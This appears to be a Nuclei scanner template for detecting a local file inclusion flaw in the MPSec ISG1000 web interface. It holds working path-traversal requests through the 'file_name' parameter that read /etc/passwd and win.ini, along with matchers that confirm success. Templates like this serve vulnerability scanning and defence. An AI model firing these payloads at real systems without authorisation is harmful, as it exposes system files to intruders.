43 lines
1.2 KiB
YAML
43 lines
1.2 KiB
YAML
id: mpsec-lfi
|
|
|
|
info:
|
|
name: MPSec ISG1000 - Local File Inclusion
|
|
author: pikpikcu
|
|
severity: high
|
|
description: MPSec ISG1000 is vulnerable to local file inclusion.
|
|
reference:
|
|
- https://twitter.com/sec715/status/1402884871173795842
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
max-request: 2
|
|
tags: mpsec,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd"
|
|
- "{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "for 16-bit app support"
|
|
- "root:.*:0:0:"
|
|
part: body
|
|
condition: or
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "text/plain"
|
|
part: header
|
|
|
|
# digest: 4b0a00483046022100e438572fe2bf26d4129f392daceee42381b122a1a0561599c33c8d5598e65400022100dc3b1803ea904d76a122132f1550b247cedc29d58312d716045aaec16d8d2bbc:922c64590222798bb761d5b6d8e72950
|